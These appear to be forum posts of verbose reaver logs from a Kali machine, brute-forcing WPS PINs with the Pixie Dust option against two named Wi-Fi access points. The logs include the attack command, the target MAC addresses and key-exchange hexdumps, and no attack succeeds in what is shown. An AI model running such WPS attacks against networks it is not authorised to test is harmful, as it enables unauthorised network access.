    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    WPS: Processing received message (len=422 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: UUID-E - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
    WPS: Enrollee MAC Address a8:32:9a:00:77:fe
    WPS: Enrollee Nonce - hexdump(len=16): 02 09 d9 1e 54 8d 41 9d 05 ce d5 c9 4e 35 82 19
    WPS: Enrollee Authentication Type flags 0x27
    WPS: No match in supported authentication types (own 0x0 Enrollee 0x27)
    WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
    WPS: Enrollee Encryption Type flags 0xf
    WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
    WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
    WPS: Enrollee Connection Type flags 0x1
    WPS: Enrollee Config Methods 0x86 [Ethernet] [Label] [PBC]
    WPS: Prefer PSK format key due to Enrollee not supporting display
    WPS: Enrollee Wi-Fi Protected Setup State 2
    WPS: Manufacturer - hexdump_ascii(len=15):
    57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
    WPS: Model Name - hexdump_ascii(len=7):
    52 54 4c 38 36 37 31 RTL8671
    WPS: Model Number - hexdump_ascii(len=13):
    45 56 2d 32 30 30 36 2d 30 37 2d 32 37 EV-2006-07-27
    WPS: Serial Number - hexdump_ascii(len=15):
    31 32 33 34 35 36 37 38 39 30 31 32 33 34 37 123456789012347
    WPS: Primary Device Type: 6-0050F204-1
    WPS: Device Name - hexdump_ascii(len=15):
    57 69 72 65 6c 65 73 73 20 52 6f 75 74 65 72 Wireless Router
    WPS: Enrollee RF Bands 0x1
    WPS: Enrollee Association State 0
    WPS: Device Password ID 0
    WPS: Enrollee Configuration Error 0
    WPS: OS Version 10000000
    WPS: M1 Processed
    WPS: dev_pw_id checked
    WPS: PBC Checked
    WPS: Entering State SEND_M2
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M1 message
    WPS: Found a wildcard PIN. Assigned it for this UUID-E
    WPS: Registrar Nonce - hexdump(len=16): 38 82 79 51 df fa 27 df 69 54 39 75 29 7c e1 2f
    WPS: UUID-R - hexdump(len=16): 3a 6d 8c eb 7b 2e 42 91 bf e4 68 db c1 ff bc b5
    WPS: Building Message M2
    WPS: * Version
    WPS: * Message Type (5)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * UUID-R
    WPS: * Public Key
    WPS: Generate new DH keys
    DH: private value - hexdump(len=192): 05 08 2e 95 cf a5 1b 15 36 69 1e 64 5c d1 26 7c 3f 22 e9 69 f6 c9 15 b8 ae 12 74 7c 19 88 b9 ec 71 6c 6b a6 cc f7 65 50 c1 01 83 c7 fa 10 7b 7d eb 0e 8d 49 b2 f7 95 56 e0 8a 9c 82 61 95 19 19 af d0 bb 8c d8 13 6e fb 5d be 00 f7 6a d6 c5 14 f5 e7 e6 b1 92 2b b0 27 0d bf f2 59 49 83 a2 48 a7 ea c3 3c 20 79 7f c1 1a 3e 47 23 0b 07 1f bb 60 0d 0c bf 1c fd 4c f3 78 a8 c9 7c da 51 ab 1c 51 7d bb 40 b9 e1 8c 5a 63 eb 17 04 64 bf 96 cd 9a 0f 60 52 0a fd 4a 35 a2 bf dc ff 89 63 d4 b0 c1 d5 99 b3 23 50 09 a2 74 4f 2e b2 1e cc 11 4e b4 6d 75 9c 5e 91 1c 7d 87 b2 7a 20 08 8e 71 9e
    DH: public value - hexdump(len=192): 8b cf 78 cc 4a c7 44 1a e1 c9 1f 02 3c 5a da ea 6b 0e 54 8d f0 df 75 b5 d8 75 1b e7 cc 48 65 4b 20 ea a6 9a 34 0a 71 ad fa 02 08 bf 68 e1 52 1f 14 f8 d7 20 8d e0 a5 a3 c9 33 57 92 bf 73 b0 2a fb 12 75 79 bb 70 3e 7d 94 62 e2 eb 05 4d 8b f7 5c e9 59 68 af 6c cc 74 d0 dc 07 3d 99 6f 9a 91 0b b8 5d c3 e1 e3 0a f7 7e 4b 1a 91 ae 47 ca b2 85 1e fe 61 b3 b6 ad 93 77 e1 22 c8 9d 27 4c 32 cf c2 8f c8 87 cc 97 02 29 78 dc e7 f7 f7 bf 72 63 45 c2 da 22 d9 41 43 b8 ee 0e 0d e4 e0 67 7a 4c d1 59 1a dc 81 83 28 f4 b7 b8 d1 f4 11 87 6e 6b 20 5e 06 f8 b4 c7 cf bd 04 70 af d8 bc 95 c4
    WPS: DH Private Key - hexdump(len=192): 05 08 2e 95 cf a5 1b 15 36 69 1e 64 5c d1 26 7c 3f 22 e9 69 f6 c9 15 b8 ae 12 74 7c 19 88 b9 ec 71 6c 6b a6 cc f7 65 50 c1 01 83 c7 fa 10 7b 7d eb 0e 8d 49 b2 f7 95 56 e0 8a 9c 82 61 95 19 19 af d0 bb 8c d8 13 6e fb 5d be 00 f7 6a d6 c5 14 f5 e7 e6 b1 92 2b b0 27 0d bf f2 59 49 83 a2 48 a7 ea c3 3c 20 79 7f c1 1a 3e 47 23 0b 07 1f bb 60 0d 0c bf 1c fd 4c f3 78 a8 c9 7c da 51 ab 1c 51 7d bb 40 b9 e1 8c 5a 63 eb 17 04 64 bf 96 cd 9a 0f 60 52 0a fd 4a 35 a2 bf dc ff 89 63 d4 b0 c1 d5 99 b3 23 50 09 a2 74 4f 2e b2 1e cc 11 4e b4 6d 75 9c 5e 91 1c 7d 87 b2 7a 20 08 8e 71 9e
    WPS: DH own Public Key - hexdump(len=192): 8b cf 78 cc 4a c7 44 1a e1 c9 1f 02 3c 5a da ea 6b 0e 54 8d f0 df 75 b5 d8 75 1b e7 cc 48 65 4b 20 ea a6 9a 34 0a 71 ad fa 02 08 bf 68 e1 52 1f 14 f8 d7 20 8d e0 a5 a3 c9 33 57 92 bf 73 b0 2a fb 12 75 79 bb 70 3e 7d 94 62 e2 eb 05 4d 8b f7 5c e9 59 68 af 6c cc 74 d0 dc 07 3d 99 6f 9a 91 0b b8 5d c3 e1 e3 0a f7 7e 4b 1a 91 ae 47 ca b2 85 1e fe 61 b3 b6 ad 93 77 e1 22 c8 9d 27 4c 32 cf c2 8f c8 87 cc 97 02 29 78 dc e7 f7 f7 bf 72 63 45 c2 da 22 d9 41 43 b8 ee 0e 0d e4 e0 67 7a 4c d1 59 1a dc 81 83 28 f4 b7 b8 d1 f4 11 87 6e 6b 20 5e 06 f8 b4 c7 cf bd 04 70 af d8 bc 95 c4
    WPS: DH Private Key - hexdump(len=192): 05 08 2e 95 cf a5 1b 15 36 69 1e 64 5c d1 26 7c 3f 22 e9 69 f6 c9 15 b8 ae 12 74 7c 19 88 b9 ec 71 6c 6b a6 cc f7 65 50 c1 01 83 c7 fa 10 7b 7d eb 0e 8d 49 b2 f7 95 56 e0 8a 9c 82 61 95 19 19 af d0 bb 8c d8 13 6e fb 5d be 00 f7 6a d6 c5 14 f5 e7 e6 b1 92 2b b0 27 0d bf f2 59 49 83 a2 48 a7 ea c3 3c 20 79 7f c1 1a 3e 47 23 0b 07 1f bb 60 0d 0c bf 1c fd 4c f3 78 a8 c9 7c da 51 ab 1c 51 7d bb 40 b9 e1 8c 5a 63 eb 17 04 64 bf 96 cd 9a 0f 60 52 0a fd 4a 35 a2 bf dc ff 89 63 d4 b0 c1 d5 99 b3 23 50 09 a2 74 4f 2e b2 1e cc 11 4e b4 6d 75 9c 5e 91 1c 7d 87 b2 7a 20 08 8e 71 9e
    WPS: DH peer Public Key - hexdump(len=192): d0 14 1b 15 65 6e 96 b8 5f ce ad 2e 8e 76 33 0d 2b 1a c1 57 6b b0 26 e7 a3 28 c0 e1 ba f8 cf 91 66 43 71 17 4c 08 ee 12 ec 92 b0 51 9c 54 87 9f 21 25 5b e5 a8 77 0e 1f a1 88 04 70 ef 42 3c 90 e3 4d 78 47 a6 fc b4 92 45 63 d1 af 1d b0 c4 81 ea d9 85 2c 51 9b f1 dd 42 9c 16 39 51 cf 69 18 1b 13 2a ea 2a 36 84 ca f3 5b c5 4a ca 1b 20 c8 8b b3 b7 33 9f f7 d5 6e 09 13 9d 77 f0 ac 58 07 90 97 93 82 51 db be 75 e8 67 15 cc 6b 7c 0c a9 45 fa 8d d8 d6 61 be b7 3b 41 40 32 79 8d ad ee 32 b5 dd 61 bf 10 5f 18 d8 92 17 76 0b 75 c5 d9 66 a5 a4 90 47 2c eb a9 e3 b4 22 4f 3d 89 fb 2b
    DH: shared key - hexdump(len=192): 06 ac e0 bf 27 e9 01 01 69 cc 4b d4 3a 62 f4 1b 46 04 f3 f9 a9 33 43 6d 91 1e f5 8d d9 53 06 7d 0d 3f ba 3f a7 ec bb 26 be be 01 09 0d d2 3d 50 3c 35 71 16 99 57 4d 22 85 14 04 0d 98 76 04 dd a4 35 7e 5e a1 58 55 cd 79 e1 3a 9e ac b7 fa d8 30 2d 55 a8 e4 d3 d0 ae a5 17 13 64 b8 a9 86 35 d1 fb 08 6c 66 9c 88 d9 25 24 bd e3 1a 6d 64 d2 74 c0 04 be 5a 91 18 43 0a 53 31 71 ab 9c 95 a6 5f 7d a3 5d a7 39 0d a7 70 4c e7 24 d3 08 15 53 25 f9 7b 0b dc 8b b4 2d 4c 0d 58 0e 53 2f 4d 78 be 9e 2c 89 29 2e a6 7e 74 1e 88 e5 9d 70 8e 98 a1 17 19 12 0a 0d ac d6 5f 27 91 1a 81 07 21 01
    WPS: DH shared key - hexdump(len=192): 06 ac e0 bf 27 e9 01 01 69 cc 4b d4 3a 62 f4 1b 46 04 f3 f9 a9 33 43 6d 91 1e f5 8d d9 53 06 7d 0d 3f ba 3f a7 ec bb 26 be be 01 09 0d d2 3d 50 3c 35 71 16 99 57 4d 22 85 14 04 0d 98 76 04 dd a4 35 7e 5e a1 58 55 cd 79 e1 3a 9e ac b7 fa d8 30 2d 55 a8 e4 d3 d0 ae a5 17 13 64 b8 a9 86 35 d1 fb 08 6c 66 9c 88 d9 25 24 bd e3 1a 6d 64 d2 74 c0 04 be 5a 91 18 43 0a 53 31 71 ab 9c 95 a6 5f 7d a3 5d a7 39 0d a7 70 4c e7 24 d3 08 15 53 25 f9 7b 0b dc 8b b4 2d 4c 0d 58 0e 53 2f 4d 78 be 9e 2c 89 29 2e a6 7e 74 1e 88 e5 9d 70 8e 98 a1 17 19 12 0a 0d ac d6 5f 27 91 1a 81 07 21 01
    WPS: DHKey - hexdump(len=32): bb b8 13 1d 9f b4 04 b8 75 3f 79 fa db 30 ad a9 ae 07 51 09 91 61 a3 a8 12 d3 ff 38 bd 7c 9a 07
    WPS: KDK - hexdump(len=32): c8 bf 13 a7 3e 12 61 f0 e0 17 c5 59 6e 75 38 d5 06 c4 b3 f2 b5 7b 5d f7 3b a8 5f 65 22 38 3b 31
    WPS: AuthKey - hexdump(len=32): 6e 8b 56 a5 b0 ed 05 6a ac 2b 49 cb 5d a8 7e c0 9c 97 08 a5 40 e9 c5 a2 41 09 bf 66 d6 7f ff d8
    WPS: KeyWrapKey - hexdump(len=16): 6b 1a 71 73 4e 3a 04 1b 80 fc b7 e0 b7 8d d6 9b
    WPS: EMSK - hexdump(len=32): 20 78 6d 23 21 b9 59 85 24 b4 20 fc f9 6a d2 6d 2c 23 45 e6 fe 3a b2 16 6e 9d d1 15 29 77 2e f6
    WPS: * Authentication Type Flags
    WPS: * Encryption Type Flags
    WPS: * Connection Type Flags
    WPS: * Config Methods (8c)
    WPS: * Manufacturer
    WPS: * Model Name
    WPS: * Model Number
    WPS: * Serial Number
    WPS: * Primary Device Type
    WPS: * Device Name
    WPS: * RF Bands (0)
    WPS: * Association State
    WPS: * Configuration Error (0)
    WPS: * Device Password ID (0)
    WPS: * OS Version
    WPS: * Authenticator
    [+] Sending M2 message
    send_packet called from send_msg() send.c:116
    WPS: Processing received message (len=422 op_code=4)
    WPS: Received WSC_MSG
    WPS: Unsupported attribute type 0x1049 len=6
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: Unexpected state (15) for receiving M1
    WPS: returning
    [+] Received M1 message
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * Configuration Error (0)
    [+] Sending WSC NACK
    send_packet called from send_msg() send.c:116
    send_packet called from send_termination() send.c:142
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    WPS: Invalidating used wildcard PIN
    WPS: Invalidated PIN for UUID - hexdump(len=16): 63 04 12 53 10 19 20 06 12 28 a8 32 9a 00 77 fe
    WPS: A new PIN configured (timeout=0)
    WPS: UUID - hexdump(len=16): [NULL]
    WPS: PIN - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 30 12345670
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:326
    send_packet called from authenticate() 80211.c:357
    [+] Sending authentication request
    send_packet called from associate() 80211.c:410
    [+] Sending association request
    [+] Associated with A8:32:9A:00:77:FE (ESSID: Bimalawifi)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    send_packet called from resend_last_packet() send.c:161
    ^Csend_packet called from send_termination() send.c:142

    [+] Nothing done, nothing to save.
    root@kali:~# reaver -i wlan0mon -b A8:32:9A:00:77:FE -c 1 -vvv -K 1

  13. #13

    WPS pin not found!

    WPS: PIN - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 30 12345670
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:326
    send_packet called from authenticate() 80211.c:357
    [+] Sending authentication request
    send_packet called from associate() 80211.c:410
    [+] Sending association request
    [+] Associated with 5C:4C:A9:36:90:EC (ESSID: INFINITUMd064)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    WPS: Processing received message (len=424 op_code=4)
    WPS: Received WSC_MSG
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 5c 4c a9 36 90 ec
    WPS: Enrollee MAC Address 5c:4c:a9:36:90:ec
    WPS: Enrollee Nonce - hexdump(len=16): 95 77 23 a5 f2 95 e7 6a c0 f5 57 a2 51 dc 64 2b
    WPS: Enrollee Authentication Type flags 0x3f
    WPS: No match in supported authentication types (own 0x0 Enrollee 0x3f)
    WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
    WPS: Enrollee Encryption Type flags 0xf
    WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
    WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
    WPS: Enrollee Connection Type flags 0x1
    WPS: PIN - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 30 12345670
    WPS: Selected registrar information changed
    WPS: Internal Registrar selected (pbc=0)
    WPS: sel_reg_union
    WPS: set_ie
    WPS: cb_set_sel_reg
    WPS: Enter wps_cg_set_sel_reg
    WPS: Leave wps_cg_set_sel_reg early
    WPS: return from wps_selected_registrar_changed
    [+] Trying pin "12345670"
    send_packet called from deauthenticate() 80211.c:326
    send_packet called from authenticate() 80211.c:357
    [+] Sending authentication request
    send_packet called from associate() 80211.c:410
    [+] Sending association request
    [+] Associated with 5C:4C:A9:36:90:EC (ESSID: INFINITUMd064)
    [+] Sending EAPOL START request
    send_packet called from send_eapol_start() send.c:48
    [+] Received identity request
    [+] Sending identity response
    send_packet called from send_identity_response() send.c:81
    WPS: Processing received message (len=424 op_code=4)
    WPS: Received WSC_MSG
    WPS: Parsed WSC_MSG
    WPS: Received M1
    WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 5c 4c a9 36 90 ec
    WPS: Enrollee MAC Address 5c:4c:a9:36:90:ec
    WPS: Enrollee Nonce - hexdump(len=16): 95 77 23 a5 f2 95 e7 6a c0 f5 57 a2 51 dc 64 2b
    WPS: Enrollee Authentication Type flags 0x3f
    WPS: No match in supported authentication types (own 0x0 Enrollee 0x3f)
    WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
    WPS: Enrollee Encryption Type flags 0xf
    WPS: No match in supported encryption types (own 0x0 Enrollee 0xf)
    WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
    WPS: Enrollee Connection Type flags 0x1
    WPS: Enrollee Config Methods 0x84 [Label] [PBC]
    WPS: Prefer PSK format key due to Enrollee not supporting display
    WPS: Enrollee Wi-Fi Protected Setup State 2
    WPS: Manufacturer - hexdump_ascii(len=24):
    52 61 6c 69 6e 6b 20 54 65 63 68 6e 6f 6c 6f 67 Ralink Technolog
    79 2c 20 43 6f 72 70 2e y, Corp.
    WPS: Model Name - hexdump_ascii(len=28):
    52 61 6c 69 6e 6b 20 57 69 72 65 6c 65 73 73 20 Ralink Wireless
    41 63 63 65 73 73 20 50 6f 69 6e 74 Access Point
    WPS: Model Number - hexdump_ascii(len=6):
    52 54 32 38 36 30 RT2860
    WPS: Serial Number - hexdump_ascii(len=8):
    31 32 33 34 35 36 37 38 12345678
    WPS: Primary Device Type: 6-0050F204-1
    WPS: Device Name - hexdump_ascii(len=11):
    54 72 65 6e 64 43 68 69 70 41 50 TrendChipAP
    WPS: Enrollee RF Bands 0x1
    WPS: Enrollee Association State 0
    WPS: Device Password ID 4
    WPS: Enrollee Configuration Error 0
    WPS: OS Version 80000000
    WPS: M1 Processed
    WPS: Unsupported Device Password ID 4
    WPS: WPS_CONTINUE, Freeing Last Message
    WPS: WPS_CONTINUE, Saving Last Message
    WPS: returning
    [+] Received M1 message
    WPS: Found a wildcard PIN. Assigned it for this UUID-E
    WPS: Registrar Nonce - hexdump(len=16): 55 ad 16 7b ca b5 ca a0 01 8f 5a c9 8a b0 a0 44
    WPS: UUID-R - hexdump(len=16): 27 43 37 28 4d 6d 01 dd ef 3e e9 a7 81 3b 7c 43
    WPS: Building Message M2
    WPS: * Version
    WPS: * Message Type (5)
    WPS: * Enrollee Nonce
    WPS: * Registrar Nonce
    WPS: * UUID-R
    WPS: * Public Key
    WPS: Generate new DH keys
    DH: private value - hexdump(len=192): 34 81 eb 35 41 6e 80 a4 b6 c6 04 36 e1 7e d5 5f 27 6b 13 ea e2 dc 7e ce 72 75 a2 f5 db d4 b6 73 bb 2b 12 c8 9c a
    DH: public value - hexdump(len=192): de 27 12 52 ee 87 95 c3 e6 d7 ba b5 27 8a 70 d8 f8 85 98 76 82 2f 8e 92 7e ef 3b c5 60 bb 87 50 27 74 dc d8 0f 99
    WPS: DH Private Key - hexdump(len=192): 34 81 eb 35 41 6e 80 a4 b6 c6 04 36 e1 7e d5 5f 27 6b 13 ea e2 dc 7e ce 72 75 a2 f5 db d4 b6 73 bb 2b 12 c8 9c
    WPS: DH own Public Key - hexdump(len=192): de 27 12 52 ee 87 95 c3 e6 d7 ba b5 27 8a 70 d8 f8 85 98 76 82 2f 8e 92 7e ef 3b c5 60 bb 87 50 27 74 dc d8
    WPS: DH Private Key - hexdump(len=192): 34 81 eb 35 41 6e 80 a4 b6 c6 04 36 e1 7e d5 5f 27 6b 13 ea e2 dc 7e ce 72 75 a2 f5 db d4 b6 73 bb 2b 12 c8 9c
    WPS: DH peer Public Key - hexdump(len=192): 68 f3 de f3 5b 3a 47 1d ae 88 ab 77 8c f4 fa 07 67 c0 43 6b a5 1b eb b8 03 ca c6 a3 37 8a a2 cf 69 c0 6f 6
    DH: shared key - hexdump(len=192): 51 91 88 03 fa c5 4b b4 d5 5d 8a 09 ef 69 8c c5 12 c1 41 df 3a 4e a3 4b 7d 23 64 06 7b d8 50 cf b3 49 9a 92 09 d1 7
    WPS: DH shared key - hexdump(len=192): 51 91 88 03 fa c5 4b b4 d5 5d 8a 09 ef 69 8c c5 12 c1 41 df 3a 4e a3 4b 7d 23 64 06 7b d8 50 cf b3 49 9a 92 09
    WPS: DHKey - hexdump(len=32): 07 06 1f cd d3 03 f3 db 61 96 fb 42 21 cf de 62 d5 0e 02 5b c1 aa a2 64 bd 76 15 34 0e c1 63 c8
    WPS: KDK - hexdump(len=32): 12 32 a2 c5 8a c9 03 ac 72 2c 78 a4 a6 5c 96 40 6d 2a 45 4f 28 41 ba f0 a8 39 a7 cd 83 31 2c 7b
    WPS: AuthKey - hexdump(len=32): eb 1b b8 ad 18 1e e4 7d bd 30 84 1a 1e 34 dd a7 e4 ed bf 6c 4c a8 b7 67 a1 1f b4 08 e3 bf d7 6c
    WPS: KeyWrapKey - hexdump(len=16): 45 86 82 1d d8 95 68 b2 21 1a 42 a4 c7 b6 8a d5
    WPS: EMSK - hexdump(len=32): df 8e 7a be fd 3f 90 d6 a5 74 2c 45 d2 fe 8a 0d d6 f8 d5 19 cf 40 f8 4c f6 82 96 df 19 ec a8 6b
    WPS: * Authentication Type Flags
    WPS: * Encryption Type Flags
    WPS: * Connection Type Flags
    WPS: * Config Methods (8c)
    WPS: * Manufacturer
    WPS: * Model Name
    WPS: * Model Number
    WPS: * Serial Number
    WPS: * Primary Device Type
    WPS: * Device Name
    WPS: * RF Bands (0)
    WPS: * Association State
    WPS: * Configuration Error (0)
    WPS: * Device Password ID (4)
    WPS: * OS Version
    WPS: * Authenticator
    [+] Sending M2 message
    send_packet called from send_msg() send.c:116
    WPS: Processing received message (len=56 op_code=3)
    WPS: Received WSC_NACK
    WPS: Enrollee terminated negotiation with Configuration Error 2
    [+] Received WSC NACK
    WPS: Building Message WSC_NACK
    WPS: * Version
    WPS: * Message Type (14)
